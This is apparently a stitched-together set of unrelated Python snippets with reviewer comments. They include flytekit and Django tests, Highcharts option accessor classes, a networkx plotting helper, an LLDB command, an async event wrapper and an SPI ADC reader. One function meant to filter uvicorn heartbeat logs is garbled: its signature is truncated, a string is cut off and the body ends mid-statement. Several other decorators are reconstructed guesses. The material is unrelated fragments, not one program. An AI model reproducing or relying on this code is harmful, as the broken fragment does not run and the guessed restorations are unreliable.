# the inner callables appear to have lost their flytekit @task/@workflow
# decorators; all three restored — confirm against the upstream test.
@pytest.mark.skipif('pandas' not in sys.modules, reason='Pandas is not installed.')
def test_workflow():
    """End-to-end check: SQLite3Task feeds a DataFrame into a row-counting task."""
    import pandas as pd

    @task
    def my_task(df: pd.DataFrame) -> int:
        # Row count of the first column.
        return len(df[df.columns[0]])

    sql_task = SQLite3Task('test', query_template='select * from tracks limit {{.inputs.limit}}', inputs=kwtypes(limit=int), task_config=SQLite3Config(uri=EXAMPLE_DB, compressed=True))

    @workflow
    def wf(limit: int) -> int:
        return my_task(df=sql_task(limit=limit))

    assert wf(limit=5) == 5
# NOTE(review): this block is corrupted in the source — the function name and
# parameter list are truncated ("def setup_ List[str]=None):"), a logger name
# string is cut off, and the body ends mid-statement. It appears to configure
# uvicorn access-log filtering to drop heartbeat endpoints; reconstruct from
# upstream before use.
def setup_ List[str]=None):
    if (not exclude_paths):
        exclude_paths = ['/api/controller/heartbeat']
    uvicorn_logger = logging.getLogger('uvicorn.access')
    if uvicorn_logger:
        for path in exclude_paths:
            uvicorn_logger.addFilter(EndpointFilter(path=path))
    = logging.getLogger('
    if
class OptionSeriesWindbarbSonificationContexttracksMappingPlaydelay(Options):
    """Accessors for Highcharts windbarb `contextTracks.mapping.playDelay`.

    NOTE(review): each name appeared twice (getter then setter) in the source,
    so the setter shadowed the getter — the stripped @property / @<name>.setter
    decorators are restored here.
    """

    @property
    def mapFunction(self):
        # None means "not configured" (Highcharts default applies).
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
class OptionSeriesVectorSonificationDefaultspeechoptionsMappingPitch(Options):
    """Accessors for Highcharts vector `defaultSpeechOptions.mapping.pitch`.

    NOTE(review): each name appeared twice (getter then setter) in the source,
    so the setter shadowed the getter — the stripped @property / @<name>.setter
    decorators are restored here. Defaults are the JS string 'undefined'
    except mapFunction, matching the original bodies.
    """

    @property
    def mapFunction(self):
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        return self._config_get('undefined')

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        return self._config_get('undefined')

    @max.setter
    def max(self, text: str):
        self._config(text, js_type=False)

    @property
    def min(self):
        return self._config_get('undefined')

    @min.setter
    def min(self, text: str):
        self._config(text, js_type=False)

    @property
    def within(self):
        return self._config_get('undefined')

    @within.setter
    def within(self, text: str):
        self._config(text, js_type=False)
class Transpose(UnaryOp):
    """Symbolic transpose of a single tensor operand."""

    @property  # NOTE(review): original read bare '_property' — assumed a mangled decorator; confirm
    def arg_function_spaces(self):
        (tensor,) = self.operands
        # Transposing reverses the ordering of the operand's function spaces.
        return tensor.arg_function_spaces[::-1]

    def arguments(self):
        (tensor,) = self.operands
        # Arguments come back in reversed order, mirroring the transpose.
        return tensor.arguments()[::-1]

    def _output_string(self, prec=None):
        (tensor,) = self.operands
        return '(%s).T' % tensor
class Node():
    """Doubly-linked-list node holding one cached transaction.

    A node constructed without explicit neighbours links to itself, which
    makes a lone node usable as the sentinel of a circular list.
    """
    previous: 'Node'    # previous node in the ring
    next: 'Node'        # next node in the ring
    key: bytes          # lookup key for the cached value
    value: Transaction  # cached payload

    def __init__(self, previous: Optional['Node']=None, next: Optional['Node']=None, key: bytes=b'', value=None, value_size: int=0) -> None:
        # Self-link when no neighbour is supplied (circular-list sentinel).
        self.previous = self if previous is None else previous
        self.next = self if next is None else next
        self.key = key
        self.value = value
        self.value_size = value_size
# NOTE(review): original decorator line read bare '.django_db' — restored the
# standard pytest-django marker; confirm against the original source.
@pytest.mark.django_db
def test_parent_recipient_with_id_and_name(recipient_lookup):
    """Parent-recipient URIs resolve by DUNS or UEI when the name matches."""
    # Lookup by legacy DUNS (recipient_unique_id) for a parent recipient.
    recipient_parameters = {'recipient_name': 'Parent Recipient Tester', 'recipient_uei': None, 'parent_recipient_uei': None, 'recipient_unique_id': '123', 'parent_recipient_unique_id': None, 'is_parent_recipient': True}
    expected_result = '01c03484-d1bd-41cc-2aca-4b427a2d0611-P'
    assert obtain_recipient_uri(**recipient_parameters) == expected_result
    # Lookup by UEI for the same parent recipient.
    recipient_parameters = {'recipient_name': 'Parent Recipient Tester', 'recipient_uei': '123', 'parent_recipient_uei': None, 'recipient_unique_id': None, 'parent_recipient_unique_id': None, 'is_parent_recipient': True}
    expected_result = 'f5ba3b35-167d-8f32-57b0-406c3479de90-P'
    assert obtain_recipient_uri(**recipient_parameters) == expected_result
def test_spec(store: Connection) -> None:
    """Exercise the 'spec' request in every mode, signed and unsigned."""
    # An unsigned request must be rejected; the signed one returns sign() code.
    unsigned = request('spec', mode='sign')
    assert do_request(store, unsigned) == 'signature required', 'sig required'
    assert 'def sign' in do_signed(store, unsigned), 'mode=sign'
    # Each remaining mode returns its characteristic snippet.
    for mode, needle, label in (('verify', 'def verify', 'mode=verify'),
                                ('request', 'base64', 'mode=request')):
        assert needle in do_signed(store, request('spec', mode=mode)), label
    # Omitting the mode behaves exactly like mode='all'.
    all_response = do_signed(store, request('spec', mode='all'))
    assert do_signed(store, request('spec')) == all_response, 'default behavior'
    # An unknown mode yields a usage hint.
    assert 'please use' in do_signed(store, request('spec', mode='asdf'))
def create_patch_sequential(ffrom, fto, fpatch, compression, suffix_array_algorithm, data_format, data_segment, use_mmap, heatshrink_window_sz2, heatshrink_lookahead_sz2):
    """Write a sequential-type patch: header, to-file size, then the patch data."""
    header = pack_header(PATCH_TYPE_SEQUENTIAL,
                         compression_string_to_number(compression))
    fpatch.write(header)
    fpatch.write(pack_size(file_size(fto)))
    # Delegate the heavy lifting (diff + compression) to the data writer.
    create_patch_sequential_data(ffrom, fto, fpatch, compression,
                                 suffix_array_algorithm, data_format,
                                 data_segment, use_mmap,
                                 heatshrink_window_sz2,
                                 heatshrink_lookahead_sz2)
def plot_graph(G, ax=None, k=2, pos=None):
    """Draw a dependency graph with colour-coded nodes, edges and a legend.

    Args:
        G: networkx graph; nodes carry a 'facecolor' attribute and edges
           carry 'color', 'style' and 'alpha' attributes.
        ax: matplotlib axes to draw on; a new figure is created when None.
        k: spring-layout spacing parameter (used only when pos is None).
        pos: precomputed node positions; computed via spring layout when None.

    Returns:
        (node_artists, edge_artists, labels, pos) for further styling.
    """
    if ax is None:
        # was misleadingly named 'env'; the figure handle is not needed
        _, ax = plt.subplots(nrows=1, ncols=1)
    if pos is None:
        pos = nx.spring_layout(G, k=k)
    bbox = dict(facecolor='skyblue', edgecolor='black', boxstyle='round,pad=0.2', alpha=0.5)
    labels = nx.draw_networkx_labels(G, pos, bbox=bbox, ax=ax)
    for n, data in G.nodes(data=True):
        labels[n].get_bbox_patch().set_facecolor(data['facecolor'])
    # Invisible oversized nodes — presumably drawn so edge arrows stop short
    # of the labels; kept because removing them changes edge clipping. The
    # original assigned this to nodes_plt only to overwrite it below.
    nx.draw_networkx_nodes(G, pos, node_color='white', node_size=1500, alpha=0, ax=ax)
    # Collect edge attributes in a single pass instead of three.
    edge_attrs = [data for (_, _, data) in G.edges(data=True)]
    colors = [d['color'] for d in edge_attrs]
    styles = [d['style'] for d in edge_attrs]
    alphas = [d['alpha'] for d in edge_attrs]
    lines = nx.draw_networkx_edges(G, pos, arrows=True, edge_color=colors, width=0.75, ax=ax)
    for style, alpha, line in zip(styles, alphas, lines):
        line.set_linestyle(style)
        line.set_alpha(alpha)
    nodes_plt = nx.draw_networkx_nodes(G, pos, node_color='white', node_size=350, alpha=1.0, ax=ax)
    # Legend swatches for each node/edge category.
    root_patch = mpatches.Patch(color='skyblue', label='source')
    sink_patch = mpatches.Patch(color='lightgreen', label='sink')
    stale_patch = mpatches.Patch(color='lightgrey', label='stale')
    node_patch = mpatches.Patch(color='khaki', label='node')
    stale_line = Line2D([0], [0], label='stale', color='lightgrey')
    cyclic_line = Line2D([0], [0], label='cyclic', color='red')
    dag_line = Line2D([0], [0], label='acyclic', color='black')
    nondag_line = Line2D([0], [0], label='skipped', color='green', linestyle='dotted')
    ax.legend(handles=[root_patch, sink_patch, node_patch, stale_patch, dag_line,
                       cyclic_line, nondag_line, stale_line],
              ncol=4, prop={'size': 8}, loc='upper center',
              bbox_to_anchor=(0.5, -0.05), fancybox=True, shadow=True)
    return (nodes_plt, lines, labels, pos)
def list_from_array_of_namedtupes(array_of_namedtupes: Union[(List[Any], NamedTuple)], key, func, join: bool=False) -> Union[(List[Any], str)]:
    """Collect field *key* from each namedtuple, optionally joined to a string.

    Raises Exception when any element lacks the requested field.
    """
    result = []
    for tup in array_of_namedtupes:
        # Guard clause: fail fast on the first element missing the field.
        if key not in tup._fields:
            raise Exception("Element '" + key + "' in '" + func + "' is not supported")
        result.append(getattr(tup, key))
    return string_from_list_optionally(result, join)
class TestFuseExpand(unittest.TestCase):
    """Checks that a broadcastable expand feeding an elementwise op is fused away."""

    # NOTE(review): original decorator was a bare '([param(...), param(...)])' —
    # restored as parameterized.expand; confirm against the original source.
    @parameterized.expand([
        param(True, 'test_fuse_expand_elementwise_exact'),
        param(False, 'test_fuse_expand_elementwise_non_exact'),
    ])
    def test_fuse_expand_elementwise(self, exact_match: bool, name: str):
        # Exact match: y already has x's trailing shape; non-exact: broadcast 1x1.
        (N, M) = ((2, 10) if exact_match else (1, 1))
        x = Tensor([IntVar([1, 10], name='batch'), 2, 10], is_input=True, name='x')
        B = ops.size()(x, 0)
        y = Tensor([1, N, M], is_input=True, name='y')
        y_expanded = ops.expand()(y, [B, (- 1), (- 1)])
        z = ops.elementwise(FuncEnum.ADD)(x, y_expanded)
        z._attrs['is_output'] = True
        z._attrs['name'] = 'z'
        with compile_model(z, detect_target(), './tmp', name) as mod:
            # The expand must have been fused into the elementwise op.
            self.assertFalse(graph_has_op(mod.debug_sorted_graph, 'expand'))
            for batch_size in (1, 5, 10):
                x_pt = torch.randn((batch_size, 2, 10)).half().cuda()
                y_pt = torch.randn((1, N, M)).half().cuda()
                z_pt = (x_pt + y_pt.expand(batch_size, (- 1), (- 1)))
                z_ait = torch.empty_like(z_pt)
                mod.run_with_tensors({'x': x_pt, 'y': y_pt}, {'z': z_ait})
                self.assertTrue(torch.equal(z_ait, z_pt), f'''z_ait={z_ait!r}
z_pt={z_pt!r}''')
class Operations(object):
    """Registry of pending persistence operations keyed by (class, identity)."""

    def __init__(self):
        # Insertion order matters for replay, hence an ordered mapping.
        self.objects = OrderedDict()

    def format_key(self, target):
        # Key on both class and identity so distinct mapped classes never collide.
        return (target.__class__, identity(target))

    def __contains__(self, target):
        return self.format_key(target) in self.objects

    def __setitem__(self, key, operation):
        self.objects[key] = operation

    def __getitem__(self, key):
        return self.objects[key]

    def __delitem__(self, key):
        del self.objects[key]

    def __bool__(self):
        return bool(self.objects)

    def __nonzero__(self):
        # Python 2 truthiness protocol delegates to __bool__.
        return self.__bool__()

    def __repr__(self):
        return repr(self.objects)

    def entities(self):
        """Set of mapped classes that have pending operations."""
        return {key[0] for key, _ in self.iteritems()}

    def iteritems(self):
        return six.iteritems(self.objects)

    def items(self):
        return self.objects.items()

    def add(self, operation):
        self[self.format_key(operation.target)] = operation

    def add_insert(self, target):
        # A target already tracked is being re-saved: record an update instead.
        kind = Operation.UPDATE if target in self else Operation.INSERT
        self.add(Operation(target, kind))

    def add_update(self, target):
        state_copy = copy(sa.inspect(target).committed_state)
        relationships = sa.inspect(target.__class__).relationships
        for rel_key, relationship in relationships.items():
            # Collection-valued relationship changes are tracked elsewhere; drop them.
            if relationship.direction.name in ('ONETOMANY', 'MANYTOMANY') and rel_key in state_copy:
                del state_copy[rel_key]
        # Only record an update when scalar state actually changed.
        if state_copy:
            self.add(Operation(target, Operation.UPDATE))
def remove_vscode_tasks_launch_files(fips_dir, proj_dir, impex, cfg):
    """Delete generated .vscode/tasks.json and launch.json from imported projects."""
    for dep_proj_name in reversed(impex):
        dep_proj_dir = util.get_project_dir(fips_dir, dep_proj_name)
        # Same removal logic for both generated files.
        for filename in ('tasks.json', 'launch.json'):
            file_path = dep_proj_dir + '/.vscode/' + filename
            if os.path.exists(file_path):
                log.info(' deleting {}'.format(file_path))
                os.remove(file_path)
class FBPrintObjectInObjc(fb.FBCommand):
    """'poobjc': evaluate an expression in an ObjC++ context and print the result."""

    def name(self):
        return 'poobjc'

    def description(self):
        return 'Print the expression result, with the expression run in an ObjC++ context. (Shortcut for "expression -O -l ObjC++ -- " )'

    def args(self):
        return [fb.FBCommandArgument(arg='expression', help='ObjC expression to evaluate and print.')]

    def run(self, arguments, options):
        # Delegate to LLDB's expression command, forcing the ObjC++ language.
        command = 'expression -O -l ObjC++ -- ' + arguments[0]
        lldb.debugger.HandleCommand(command)
class Aiterate(Event):
    """Event that re-emits every item produced by an async iterator.

    A background task drains ``ait`` and forwards each yielded value through
    ``emit``; iterator failures are routed to ``error_event`` and the event
    is marked done either way.
    """
    __slots__ = ('_task',)

    def __init__(self, ait):
        Event.__init__(self, ait.__qualname__)
        event_loop = get_event_loop()
        self._task = asyncio.ensure_future(self._looper(ait), loop=event_loop)

    async def _looper(self, ait):
        try:
            async for payload in ait:
                self.emit(payload)
        except Exception as exc:
            # Surface iterator failures instead of losing them in the task.
            self.error_event.emit(self, exc)
        self._task = None
        self.set_done()

    def __del__(self):
        # Cancel the drain task if the event is garbage-collected mid-iteration.
        if self._task:
            self._task.cancel()
class ADCEntity():
    """Wrapper around an MCP3008/MCP3208-style SPI ADC.

    Opens the SPI device at (busnum, devnum); on any failure the entity is
    left uninitialized with ``spi = None`` and reads return error values.
    ``ADread`` is bound to the reader matching ``dtype`` (3008 → 10-bit,
    3208 → 12-bit, anything else → dummy).
    """

    def __init__(self, busnum=0, devnum=0, dtype=3008):
        self.busy = False          # crude mutual-exclusion flag for SPI transfers
        self.initialized = False
        self.busnum = int(busnum)
        self.devnum = int(devnum)
        self.values = [0, 0, 0, 0, 0, 0, 0, 0, 0]  # last-seen value per channel
        try:
            self.spi = spidev.SpiDev()
            self.spi.open(self.busnum, self.devnum)
            self.spi.max_speed_hz = 1000000
            self.initialized = True
        except Exception:  # was a bare except: don't swallow SystemExit/KeyboardInterrupt
            self.initialized = False
            self.devnum = -1
            self.busnum = -1
            self.spi = None
        if dtype == 3008:
            self.ADread = self.ADread3008
        elif dtype == 3208:
            self.ADread = self.ADread3208
        else:
            self.ADread = self.ADreadDummy
            self.initialized = False

    def ADreadDummy(self, channel):
        """Fallback reader for unknown device types; always returns None."""
        return None

    def ADread3008(self, channel):
        """Read a 10-bit sample from MCP3008 channel 0-7; returns -1 on error."""
        channel = int(channel)
        if channel > 7 or channel < 0:
            return -1
        # Fall back to the last known value when the bus stays busy.
        val = self.values[channel]
        try:
            if self.busy:
                time.sleep(0.1)
            if not self.busy:
                self.busy = True
                # start bit; single-ended mode + channel in the high nibble; filler byte
                rawData = self.spi.xfer2([1, (8 + channel) << 4, 0])
                val = ((rawData[1] & 3) << 8) + rawData[2]
                self.busy = False
                self.values[channel] = val
        except Exception:
            self.busy = False
            val = -1
        return val

    def ADread3208(self, channel):
        """Read a 12-bit sample from MCP3208 channel 0-7; returns -1 on error."""
        channel = int(channel)
        if channel > 7 or channel < 0:
            return -1
        # Fall back to the last known value when the bus stays busy.
        val = self.values[channel]
        try:
            if self.busy:
                time.sleep(0.1)
            if not self.busy:
                self.busy = True
                # start + single-ended bits with the channel split across two bytes
                rawData = self.spi.xfer2([(4 | 2) | (channel >> 2), (channel & 3) << 6, 0])
                val = ((rawData[1] & 15) << 8) + rawData[2]
                self.busy = False
                self.values[channel] = val
        except Exception:
            self.busy = False
            val = -1
        return val
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.